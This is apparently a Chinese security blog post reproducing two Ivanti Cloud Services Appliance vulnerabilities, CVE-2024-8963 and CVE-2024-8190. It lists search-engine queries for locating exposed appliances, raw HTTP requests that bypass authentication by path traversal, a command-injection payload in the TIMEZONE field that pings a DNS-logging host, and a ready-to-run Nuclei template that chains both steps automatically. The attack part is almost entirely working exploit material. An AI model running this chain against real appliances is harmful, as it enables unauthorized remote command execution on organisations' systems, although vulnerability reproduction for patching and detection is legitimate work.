【漏洞复现】CVE-2024-8963、CVE-2024-8190
【漏洞复现】CVE-2024-8963、CVE-2024-8190
原创 混子Hacker 混子Hacker 2024-12-17 09:56
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。
[
漏洞简介
]
——
咱得静悄悄的干,输了呢就当没干过
【
摘自-雷军
】 ——
Ivanti Cloud Service Appliance
Ivanti Cloud Service Appliance
是一种集成的管理平台,主要用于支持IT服务管理和云服务的自动化,它旨在帮助企业简化和自动化IT流程,提高运营效率。该平台在Ivanti Cloud Services Appliance (CSA) 4.6 < Patch 519中存在CVE-2024-8963路径遍历和CVE-2024-8190命令执行漏洞
漏洞信息
混子Hacker
01
资产测绘
fofa: app="Ivanti(R)-Cloud-Services-Appliance"
Quake:app: "Ivanti Endpoint Manager (EPM)"
# 风里雨里,我都在quake等你。个人中心输入邀请码“lnBNF0”你我均可获得5,000长效积分哦,地址 quake.360.net
混子Hacker**
02
漏洞复现
GET /client/index.php%3F.php/gsb/users.php HTTP/1.1
Host: xxx
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Cookie: LDCSASESSID=kt57k50mb3m48giosk8pikfpk5
CVE-2024-8963路径遍历
绕过权限校验访问后台获取敏感数据
CVE-2024-8190命令执行
首先利用前面的CVE-2024-8963获取LDCSA_CSRF和cookie值
带上cookie和LDCSA_CSRF再利用CVE-2024-8963访问
/gsb/datetime.php执行命令
POST /client/index.php%3F.php/gsb/datetime.php HTTP/1.1
Host: xxx
Connection: keep-alive
Content-Length: 211
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Cookie: LDCSASESSID=f1o2t0t15fi2cdb7pautdgtin2
dateTimeFormSubmitted=1&LDCSA_CSRF=sid:eb6f7c1771acf1f001d1b78059e0e048bbcd2122,1734425798&CMONTH=12&CDAY=17&CYEAR=2024&CHOUR=16&CMIN=30&TIMEZONE=;`ping -c2 -w2 thomas.504c79ddf1.ipv6.1433.eu.org`;&SUBMIT_TIME=Save
dnslog平台收到响应
混子Hacker**
03
Nuclei Poc
id: CVE-2024-8963_8190
info:
name: CVE-2024-8963_8190
author: Thomas
severity: high
description: Ivanti Cloud Service Appliance Path Traversal AND RCE
tags: Ivanti
metadata:
fofa-query: app="Ivanti(R)-Cloud-Services-Appliance"
requests:
- raw:
- |
GET /client/index.php%3F.php/gsb/users.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
- |
POST /client/index.php%3F.php/gsb/datetime.php HTTP/1.1
Host: {{Hostname}}
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: {{cookie}}
dateTimeFormSubmitted=1&LDCSA_CSRF={{LDCSA_CSRF}}&CMONTH=12&CDAY=17&CYEAR=2024&CHOUR=16&CMIN=30&TIMEZONE=;`ping -c2 -w2 yourdnslog`;&SUBMIT_TIME=Save
matchers-condition: and
extractors:
- type: regex
name: cookie
part: header
group: 1
internal: true
regex:
- "Set-Cookie:(.*?);"
- type: regex
name: LDCSA_CSRF
part: body
internal: true
group: 1
regex:
- 'name=''LDCSA_CSRF'' value="(.*?)"'
matchers:
- type: status
status:
- 200
<<<
END
原创文章|转载请附上原文出处链接
更多漏洞|关注作者查看
作者|混子Hacker